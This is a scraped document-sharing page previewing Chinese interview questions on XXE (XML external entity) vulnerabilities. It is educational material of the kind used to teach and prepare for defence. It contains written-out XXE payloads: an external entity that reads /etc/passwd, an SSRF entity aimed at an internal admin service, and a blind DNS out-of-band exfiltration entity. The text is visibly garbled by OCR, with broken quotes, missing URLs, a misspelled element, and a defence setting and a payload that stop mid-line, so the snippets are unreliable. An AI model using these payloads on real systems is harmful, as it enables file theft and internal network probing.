网络安全面试XXE漏洞笔试,面试题.docVIP

  • 0
  • 0
  • 约1.4千字
  • 约 3页
  • 2026-07-17 发布于湖南
  • 举报

XXE漏洞笔试/面试题

1.请解释XXE漏洞的基本原理,并说明攻击者如何利用SYSTEM关键字实现敏感文件读取?XXE漏洞源于XML解析器未正确限制外部实体加载。攻击者通过注入包含SYSTEM关键字的DOCTYPE声明,强制解析器读取外部资源。例如:

1!DOCTYPErOot!ENTITYxxeSYSTEMfile:///etc/passwd]

2rootxxe;/root

3

解析器会加载/etc/passwd文件内容并返回至响应中。

如何通过XXE漏洞实现服务器端请求伪造(SSRF)?给出Payload示例及防御方案

攻击者利用外部实体发起HTTP请求探测内网服务:

1!ENTITY%ssrfSYSTEM:8080/admin

2%ssrf;

防御需禁用外部实体解析,例如Java中配置

documentBuilderFactory.setFeature(/xml/features/disallow-doctype-decl,

3.列举三种XXE漏洞的检测方法,并说明盲注场景下的外带数据技术检测方法:

·基础Payload触发错误回显

盲注利用DNS外带:!ENTITY%dtdSYSTEM“/?data=exfi1

时间延迟检测:通过实体加载耗时判断漏洞存在。盲注外带技术:

!ENTITY%fileSYSTEMphp://filter/conve

文档评论(0)

1亿VIP精品文档

相关文档